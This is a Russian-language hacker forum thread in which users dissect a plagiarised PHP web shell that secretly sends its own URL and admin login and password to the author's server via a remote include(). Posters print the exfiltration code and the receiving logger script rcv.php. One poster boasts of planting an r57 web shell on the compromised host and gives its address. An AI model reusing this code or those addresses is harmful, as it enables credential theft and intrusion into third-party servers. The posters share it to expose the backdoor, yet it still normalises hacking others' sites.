heks, это вполне логично. Антивирь не сравнивал процесс работы шеллов... Он просто сравнил сигнатуры.
Причем здесь gzip? PHP: function selfURL() { $s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : ""; $protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s; $port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]); return $protocol."://".$_SERVER['SERVER_NAME'].$port.$_SERVER['REQUEST_URI']; } $url=SelfURL(); include("http://www.go-joy.com/upload/temp/rcv.php?url=".$url."&login=".$login."&pass=".$pass); скрипт сливает адрес шелла автору. И накой такой шелл нужен?!
PHP: include("http://www.go-joy.com/upload/temp/rcv.php?url=".$url."&login=".$login."&pass=".$pass); отправляет на www.go-joy.com логин и пасс от админки шелла ;/
Это - не шелл. Это - говно! А теперь по пунктам: 1. Он - говно. 2. Дизайн не его (изменены два-три цвета) 3. Движок не его (вообще ничего не изменено). 4. Он - говно 5. Он стучит о местоположение и аккаунте админа. 6. Аккаунт незашифрован. 7. Сниффер акков расположен на взломанном сайте (я туда, кстати, тоже шелл залил - http://www.go-joy.com/upload/temp/r57.php, поизучайте на ). 8. Он - говно! Содежржимое файла rcv.php (сниффера): Code: <? $file = fopen("here.txt","a"); $res=$_GET["url"]." ".$_GET["login"]." ".$_GET["pass"]; fputs($file,$res); fclose($file);?> Содержимое here.txt: Code: http://microsoft.com/nowelnahuy.php fuckmoymosk vrotmnenogi../../ LoL! Кто-то прикололся))) P.S. Я выкладываю УРЛ шелла ТОЛЬКО в целях показать сущность плагиатора для ТС и уважаемых Ачатовцев. Просьба не банить, не удалять, минусы не ставить. P.P.S. Он - говно!!!
PHP: include("http://www.go-joy.com/upload/temp/rcv.php?url=".$url."&login=".$login."&pass=".$pass); пипец какой извращенский способ сообщить данные хозяину -удаленный инклуд не всегда работает - да и тупо както... Проще fopen() -ом было бы))